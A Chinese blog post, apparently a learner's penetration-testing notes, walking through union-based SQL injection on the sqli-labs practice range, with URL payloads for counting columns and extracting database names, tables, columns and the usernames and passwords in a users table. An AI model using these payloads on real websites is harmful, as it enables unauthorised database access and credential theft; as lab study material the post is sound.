渗透学习笔记(三)--SQL注入学习(一)

使用靶场为sqli靶场
例题为GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入)

sql注入常见攻击思路

  1:寻找到SQL注入的位置

  2:判断服务器类型和后台数据库类型

  3:针对不同的服务器和数据库特点进行SQL注入攻击

常见流程

  1. 首先判断sql语句闭合方式

常见的闭合方式:
id = 'input_id'
id = ('input_id')
id = "input_id"
id = ("input_id")

判断方法:
使用'或者"来进行判断,如果输入?id=1'报错,那就是单引号闭合,"类似。
在这里插入图片描述
如上图,'报错。

  1. 判断回显列数
    使用order by子句判断返回的列数。
    ?id=1' order by 5 %23

%23#的url编码,用来注释掉另一个'
order by 5发现报错
继续尝试
发现order by 3正常
在这里插入图片描述在这里插入图片描述

在这里插入图片描述

  1. 判断返回格式:

id=-1' union select 1,2,3 %23

发现2和3被回显。
在这里插入图片描述

知道返回的列名之后,就可以执行后继的操作和查询各种数据了。

例如user()查询用户名,detabase()查询当前的数据库名,version()查询数据库版本

id=-1' union select 1,database(),version() %23

在这里插入图片描述

  1. 查询出当前数据库所有的表名

id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) %23

其中group_concat()是用来把数据在一行中打印出来。
information_schema是mysql特有的库,存储各种数据库的信息
在这里插入图片描述

  1. 注入出某一个表中的全部列名
    id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='user') %23

在这里插入图片描述

  1. 获得字段内容

id=-1' union select 1,2,(select group_concat(Password) from users) %23
在这里插入图片描述
id=-1' union select 1,2,(select group_concat(username) from users) %23
在这里插入图片描述

posted @ 2022-01-17 21:53  CK_0ff  阅读(83)  评论(0编辑  收藏  举报